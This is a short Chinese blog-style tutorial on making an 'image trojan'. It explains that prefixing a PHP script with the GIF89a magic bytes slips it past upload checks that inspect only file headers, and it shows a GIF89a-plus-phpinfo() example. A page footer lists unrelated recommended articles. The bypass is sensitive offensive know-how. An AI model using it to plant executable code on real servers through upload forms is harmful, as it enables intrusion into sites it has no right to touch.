图片文件通常有称作幻数的头字节,我们来看一下几种图片文件的幻数:
(注意!下面是二进制而不是文本格式的数据)
通过检查头几位字节,可以分辨是否是图片文件!
通过检查头几位字节,可以分辨是否是图片文件!
给上传脚本加上相应的幻数头字节就可以,php引擎会将GIF89a的内容当作html文本,不解释而跳过,后面的代码仍然能够得到执行比如下面:
(一般不限制图片文件格式的时候使用GIF的头比较方便,因为全都是文本可打印字符。)
GIF89a
<?php
phpinfo();
?>
制作图片木马
马船长2024-11-14 23:30
相关推荐
静止了所有花开32 分钟前
SpringMVC学习笔记(二)爱吃生蚝的于勒40 分钟前
C语言内存函数L_cl3 小时前
Python学习从0到1 day26 第三阶段 Spark ④ 数据输出Mephisto.java3 小时前
【大数据学习 | HBASE】hbase的读数据流程与hbase读取数据红中马喽4 小时前
JS学习日记(webAPI—DOM)尘浮生5 小时前
Java项目实战II基于微信小程序的移动学习平台的设计与实现(开发文档+数据库+源码)Young_202202026 小时前
学习笔记——KMP行然梦实6 小时前
学习日记_20241110_聚类方法(K-Means)秀儿还能再秀6 小时前
机器学习——简单线性回归、逻辑回归